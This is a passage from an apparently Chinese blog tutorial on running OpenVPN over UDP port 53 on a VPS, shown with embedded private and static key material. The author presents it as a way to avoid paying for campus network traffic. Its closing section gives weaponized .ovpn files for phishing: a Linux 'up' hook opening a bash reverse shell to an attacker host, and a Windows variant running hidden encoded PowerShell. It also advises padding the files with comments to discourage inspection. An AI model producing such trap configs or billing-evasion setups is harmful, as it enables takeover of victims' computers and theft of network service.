kGKpDqqGWVtT+T4d0NsKqKIzKmCGs0F/LCYE6g4Qfbp8ebSB/9SbxqGY672O9J6I RffAVG5x55zoMgaO1c5Z+t/Tt0OiB2lEIst0zovKBeXw4Cy6+MvzSZPd1N7AzWpU bwKCAQEA3fWmiv5dwSgQFVtOtJwOSs6ciTq2rOwDtAbmd4dXwkPiHwO6wgwmZjyc UeRn4qF24R8Q9tgR57bTU4Omgw7sK9hwkeGBAoRq8T2kB6r6es1fre7fC09czFga gQ+wYgd8sKvFp8058agvwXMJPWD83WSHI/yWFKK1CkJrAarpz4TyMyWa6WfzdZbN OSY6aeWGzKXDHbGV+XAHc5Qf2DT7vFz4bGe8+z4ShUgNSCd0AOIjv3ZXK8JVP+yz 27tZ2sBG8Kd4HazRdxhmECJNfJ8lfuDJc5lf49UVVG12IzxkgeHAavAo/bUfUUyZ eOCaPoF1Ivz8OlAB4m28CQUGsw8DgA== -----END PRIVATE KEY----- </key> remote-cert-tls server key-direction 1 <tls-auth> # # 2048 bit OpenVPN static key # -----BEGIN OpenVPN Static key V1----- 9275404a741d41d12858838452a59778 7d1166b1c88e681212c10dc87b26a319 25130d277289d9e0b071370edf50c476 6b36e5372a896051ae814a291dbc09f4 e95d1baca351c998a26746ee726eda37 4cc189024c85da2be377e7ccb6673998 47152751fa1f8dda7270eb09c2adf114 5bdaa6ca4d9923b5849d0e33ed5ecb09 b800def55d307fc7b7498f74bef6dda5 6d59c8ac1b640e2d2192ae0066dcdf46 7ef96ac1423e43d90390b8b01df745af 142bc0b5cec18ba810c3313a5cd3b106 c325fa3597369e704032a97e63e63ceb 5d5db71a2fd0306eac39cd5fb9b116bb 30d937e4135a7eee5d03212f52aa5438 7bf1da3899fce6c63aba1610d9870ee7 -----END OpenVPN Static key V1----- </tls-auth> cipher AES-256-CBC comp-lzo verb 3
经过测试,发现访问其他网站或服务的时候IP地址已经变成了vps的地址,而且无论是手机端openvpn还是PC端openvpn都可以使用,多个客户端可以相互ping通。如果您已经做到了这一步,那么恭喜,组网已经成功了。
这个方法在学校可以免流!!!本地可以直接在没有登录验证系统的情况下连接VPN,之后的流量会将本地电脑和vps通过udp53端口进行组网,成功之后依旧通过udp53进行通信 ,于是之后的流量就自然不需要付费了。如果还嫌不够安全的话,可以进一步利用防火墙限制VPN登录ip地址、利用规则等限制VPN登录的客户端数目、配置IPSec规则继续施加保护等等。
强调一下,请妥善保存ovpn配置文件,不要泄露,也最好不要和陌生人的机器组网。
另外,如果需要将udp改为tcp(这个操作会导致校园网无法免流),只需要对配置文件 client-allinone.ovpn
进行小修改:
Change proto udp
to proto tcp
Change remote xxx.xxx.xxx.xxx 53
to remote xxx.xxx.xxx.xxx {tcp_port}
Change <tls-auth>
to <tls-crypt>
Change </tls-auth>
to </tls-crypt>
另外,如果需要使用账号/密码登录(方便或是提高安全性)或者是多用户的情况(如果直接用密钥文件认证来进行多用户的操作,很容易因为vps端的路由冲突不得不重启服务),篇幅所限,可参考该文章 。
在参考文章基础上,向单个配置文件 client-allinone.ovpn
加入auth-user-pass
与auth-nocache
两行即可使之跳出账号认证。
另外,openvpn完全可以打一个ipv6的隧道(只要有公网ipv6的地址),应该也可以实现免流,同样,限制速度的是vps的带宽。该网站 提供了一个能够为自己的ipv4主机申请ipv6地址的方法,但是我没有成功。如果没有其他方法白嫖的话,这种方法不够经济。
ps:其实以上操作的目的并不只是绕过校园网,取这个标题只是噱头罢了。它其实一方面可作为套娃式马甲,另一方面直接组网而避免使用其他不太保险的内网穿透手段。 当然,这样的组网方式就能够把自己所有的设备集中到一个内网中——再配置些服务,一个手机就能相对安全地操控好几台电脑,玩法丰富——你甚至可以在手机上访问自己寝室的虚拟机桌面、查询自己的社工库、远程跑脚本、互相传文件……
感觉以现在的表述水平写这篇文章还是差了些许火候,献丑了。如有错误或不解,请直接留言。
还参考了几篇文章:
https://www.cnblogs.com/fjping0606/p/6601234.html
https://www.jianshu.com/p/a9b670200428
https://www.centos.bz/2016/10/establish-a-tunnel-with-openvpn/
https://blog.sorz.org/p/openvpn-traversal/
http://blog.joylau.cn/2020/05/28/OpenVPN-Config/
黑色彩蛋 这部分和上面关联不大,主要介绍利用ovpn文件反弹shell的方法。
其实不可信的ovpn文件非常危险,这一点可以作为钓鱼——某些入侵心切的人得到了你的ovpn文件就希望直接接入你的内网而疏于检查ovpn文件,然后就被反杀了。
构造恶意的ovpn文件非常简单,比如对付Linux的:
1 2 3 4 5 6 7 client dev tun proto udp remote xxx.xxx.xxx.xxx 53 script-security 2 up "/bin/bash -c '/bin/bash -i >& /dev/tcp/{malicious_ip}/{port} 0<&1 2>&1'" ...
当然还有对付Windows的:
1 2 3 4 5 6 7 8 9 10 11 12 client dev tun proto udp remote xxx.xxx.xxx.xxx 53 script-security 2 setenv k0 {malicious_powershell_base64_divided} setenv k1 {malicious_powershell_base64_divided} setenv k2 {malicious_powershell_base64_divided} setenv k3 {malicious_powershell_base64_divided} setenv kk 'start /min /b powershell /w hidden /enc %k0%%k1%%k2%%k3%' up 'C:\\Windows\\System32\\cmd.exe /c "(%kk%)|cmd"' verb 0
最好还要结合各种注释来使得对方没有任何检查文件的耐心,最终让对方执行了文件,可能发现了些许异常,但为时已晚。
脚本武器化参考文章:https://forum.90sec.com/t/topic/1289